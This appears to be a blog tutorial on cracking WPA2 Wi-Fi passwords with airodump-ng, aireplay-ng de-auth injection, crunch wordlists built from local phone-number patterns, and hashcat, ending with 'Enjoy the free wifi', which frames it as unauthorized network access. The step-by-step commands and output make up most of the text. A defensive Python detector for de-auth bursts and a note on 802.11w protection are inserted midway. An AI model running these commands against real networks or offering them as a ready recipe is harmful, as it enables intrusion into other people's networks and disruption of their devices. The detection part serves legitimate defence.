Preparation

  • Kali Linux operating system
  • A Wi-Fi dongle that supports monitor mode and packet injection. I was using a TP-LINK AX1800 Archer TX35U, which needs a driver installed from GitHub (update: that dongle was not working, so I now use an Alfa AWUS036ACM, which works out of the box without any extra driver)

Attack

You can use a root terminal for convenience (be careful, though).

1. Check the interface name using iwconfig

┌──(squarejellyfish@kali)-[~]
└─$ iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

wlan0 IEEE 802.11 ESSID:"WIFINAME"
Mode:Managed Frequency:5.745 GHz Access Point: 76:90:BC:5E:0D:F0
Bit Rate=864.8 Mb/s Tx-Power=12 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
Link Quality=58/70 Signal level=-52 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

The wireless interface is usually named something like wlanX.

2. Start monitor mode using airmon-ng start <interface-name>

airmon-ng check kill # kills processes that would interfere
airmon-ng start wlan0

In some cases the interface is renamed to wlanXmon; in my case it was not.

Your internet connection will be unusable until you run airmon-ng stop wlan0 and restart NetworkManager and whatever else airmon-ng killed (it depends on which processes check kill stopped).

3. Monitor nearby wifi traffic

airodump-ng wlan0

Output (the other networks' BSSIDs are masked as XX:XX:XX:XX:XX:XX):

CH 10 ][ Elapsed: 6 s ][ 2025-10-20 20:56

BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC   CIPHER  AUTH  ESSID

XX:XX:XX:XX:XX:XX
74:90:BC:2E:0D:F0  -41  4        0      0    6   648  WPA2  CCMP    PSK   999
XX:XX:XX:XX:XX:XX
XX:XX:XX:XX:XX:XX
XX:XX:XX:XX:XX:XX

999 is our target network. Note its BSSID and CH (channel), then run airodump-ng again, this time monitoring only the target; -w sets the output file name prefix (used later):

airodump-ng -d 74:90:BC:2E:0D:F0 -c 6 -w 999 wlan0

airodump-ng will now capture only the traffic of the target network.

4. De-auth attack to capture the 4-way WPA handshake

We want to capture the traffic of a client connecting to the target network. You can either wait until someone connects, or use aireplay-ng to inject de-auth packets that kick a client off the network; the device will usually reconnect automatically, and that reconnection is the handshake we capture.

In another terminal, run aireplay-ng -0 10, specifying the BSSID of the target network with -a and the client you want to de-auth with -c. Without -c, all clients are de-authed.

-0 means send de-auth packets, and 10 is the number of packets; -0 0 sends continuously until you stop it.

aireplay-ng -0 10 -a 74:90:BC:2E:0D:F0 -c <device-to-kick> wlan0

A couple of de-auths later, the header of the airodump-ng terminal may show "WPA handshake" followed by the BSSID.

CH  6 ][ Elapsed: 6 mins ][ 2025-10-20 21:10 ][ WPA handshake: 74:90:BC:2E:0D:F0

BSSID              PWR  RXQ  Beacons  #Data, #/s  CH  MB   ENC   CIPHER  AUTH  ESSID

74:90:BC:2E:0D:F0  -36  0    3445     28225  4    6   648  WPA2  CCMP    PSK   999

BSSID              STATION            PWR  Rate    Lost  Frames  Notes  Probes

74:90:BC:2E:0D:F0  7C:4B:26:C5:54:86  0    6e-24   2764  29142   EAPOL
74:90:BC:2E:0D:F0  98:41:5C:B1:DF:C1  0    1e-24e  0     37
74:90:BC:2E:0D:F0  E4:AA:EC:B4:CB:58  0    6e-24e  0     377

You can close the terminal now; several files will appear in the current directory. The capture file, XXX.cap, is the one we're interested in. The EAPOL entry in the Notes column marks the station whose handshake was captured.
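What this step looks like from the other side of the air: the pattern a network defender can alert on is a burst of de-auth frames aimed at one station, followed within seconds by that station re-running the EAPOL 4-way handshake. The detector below is an added example written for this post, not code from the original; its frame records are constructed tuples (timestamp, frame type, source, destination, BSSID) reusing the BSSID and station addresses shown above, and in a real deployment they would be fed from a monitor-mode capture.

```python
"""Detect de-auth bursts followed by a forced 4-way handshake (defender side)."""
from collections import defaultdict, deque

# Constructed sample records, not a real capture. Addresses reuse the ones
# shown in the airodump-ng output above.
AP = "74:90:BC:2E:0D:F0"
CLIENT = "7C:4B:26:C5:54:86"
SAMPLE_FRAMES = [
    (0.0, "beacon", AP, "ff:ff:ff:ff:ff:ff", AP),
    (1.0, "data", CLIENT, AP, AP),
    # A burst of de-auth frames claiming to come from the AP, one client targeted
    *[(2.0 + i * 0.05, "deauth", AP, CLIENT, AP) for i in range(10)],
    # The client reconnects: EAPOL messages 1-4 of the handshake
    (3.1, "eapol", AP, CLIENT, AP),
    (3.2, "eapol", CLIENT, AP, AP),
    (3.3, "eapol", AP, CLIENT, AP),
    (3.4, "eapol", CLIENT, AP, AP),
    # A single de-auth much later is normal roaming/idle behaviour, not a burst
    (60.0, "deauth", AP, "98:41:5C:B1:DF:C1", AP),
]


def detect_forced_handshakes(frames, window=5.0, threshold=5, follow=30.0):
    """Return (burst_start, bssid, station) for every station that received at
    least `threshold` de-auth frames within `window` seconds and then exchanged
    EAPOL with the BSSID within `follow` seconds of the burst starting."""
    recent = defaultdict(deque)  # (bssid, station) -> de-auth timestamps in window
    pending = {}                 # (bssid, station) -> start time of a detected burst
    alerts = []
    for ts, ftype, src, dst, bssid in sorted(frames):
        # The station is whichever address is not the AP/BSSID itself
        station = dst if src == bssid else src
        key = (bssid, station)
        if ftype == "deauth":
            q = recent[key]
            q.append(ts)
            while q and ts - q[0] > window:   # drop timestamps outside the window
                q.popleft()
            if len(q) >= threshold and key not in pending:
                pending[key] = q[0]
        elif ftype == "eapol" and key in pending:
            start = pending.pop(key)
            if ts - start <= follow:
                alerts.append((start, bssid, station))
    return alerts


if __name__ == "__main__":
    for start, bssid, station in detect_forced_handshakes(SAMPLE_FRAMES):
        print(f"t={start:.2f}s de-auth burst on {bssid} forced a handshake from {station}")
```

The lone de-auth at t=60 s produces no alert, which is the point of the windowed threshold; enabling 802.11w (Protected Management Frames) on the access point stops unauthenticated de-auth frames from being honoured in the first place.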

5. Cracking the password

Traditionally, we would use aircrack-ng to brute-force the password, but if you have a GPU, hashcat is much, much faster.

  1. Convert the .cap file to .hc22000 format

# install the hcx toolset
sudo apt install hcxtools
hcxpcapngtool -o 999.hc22000 999.cap
  2. Prepare a wordlist (optional)

Use crunch to generate a candidate password list. In my case (in Taiwan) the Wi-Fi password is often the household's landline phone number, so I generate one wordlist of 8-digit numbers and another of 10-digit numbers starting with 02.

crunch 8 8 -t %%%%%%%% -o 8-digit.txt
crunch 10 10 -t 02%%%%%%%% -o taipei-02-10-digits.txt
cat 8-digit.txt taipei-02-10-digits.txt > wordlist.txt

crunch 8 8 means a minimum and maximum length of 8 characters; -t %%%%%%%% is the pattern, where each % stands for one digit, so the list contains every 8-digit number.

  3. Crack

Use hashcat with -m 22000, the hash mode for the hc22000 (WPA-PBKDF2-PMKID+EAPOL) format, and point it at the converted hash file and the wordlist:

hashcat -m 22000 999.hc22000 wordlist.txt
  4. Enjoy the free wifi